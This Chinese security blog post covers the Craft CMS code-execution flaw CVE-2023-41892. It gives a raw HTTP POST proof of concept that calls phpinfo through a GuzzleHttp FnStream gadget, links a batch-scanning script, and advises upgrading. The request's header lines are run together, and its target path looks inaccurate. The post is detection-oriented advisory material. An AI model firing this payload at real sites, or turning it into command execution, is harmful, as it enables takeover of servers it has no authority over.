CraftCMS CVE-2023-41892 代码执行漏洞

一、漏洞简述

Craft CMS 是一个基于PHP的开源内容管理系统,专为设计师、开发人员和内容创作者打造,以其灵活性、可扩展性和用户体验而知名。在其官方仓库中,有一个名为 Awesome Craft CMS 的项目,它是一个精选的资源列表,涵盖了插件、主题、教程及社区资源,帮助用户更好地利用Craft CMS进行网站开发。其接口/ConditionsController.php存在任意代码注入漏洞,攻击者可通过该漏洞注入恶意代码执行系统命令,从而控制该系统。

二、漏洞检测poc

POST /ConditionsController.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateContent-Length: 238
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

 

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

https://github.com/ATonysan/poc-exp/blob/main/CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py

批量检测:

python CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py -f url.txt

单个url检测漏洞:

python CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py -u url

四、修复

官方已更新补丁,请升级至最新版本。

原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/89804.html

Like (0)
guozi的头像guozi
Previous 2024年6月5日 上午10:42
Next 2024年6月5日 上午10:44

相关推荐

  • win10是否兼容文泰雕刻2002?

    win10是否兼容文泰雕刻2002?这是许多网络互联网服务器行业从业者最近关注的一个热门话题。随着win10操作系统的推出,它带来了许多新的特性和改进,但同时也引发了一些新的问题。…

    行业资讯 2024年4月6日
    0
  • 网站被攻击怎么报警,网站被攻击如何防护

    随着互联网的快速发展,针对网站的攻击也越来越频繁。大公司和小型个人网站都可能面临受到攻击的风险。那么,如果您的网站多次遭到攻击,该怎么办呢?在本文中,我们将介绍有效解决网站被攻击问…

    行业资讯 2024年5月7日
    0
  • seo教程菜鸟后院seo教程

    SEO教程菜鸟后院SEO教程,是一门让你轻松掌握SEO技巧的课程。随着互联网的飞速发展,搜索引擎优化已经成为了许多企业和个人必备的技能。那么什么是SEO?它又有什么作用和重要性?如…

    行业资讯 2024年3月20日
    0
  • 网站被屏蔽,域名被浏览器屏蔽解决

    在中国大陆运营的网站必须注册。如果您不注册,您可能无法访问该网站。因此,如果您发现您的域名被屏蔽,您可能需要使用域名注册查询工具来检查您的域名是否已成功注册。如果注册失败,站长可以…

    行业资讯 2024年5月7日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注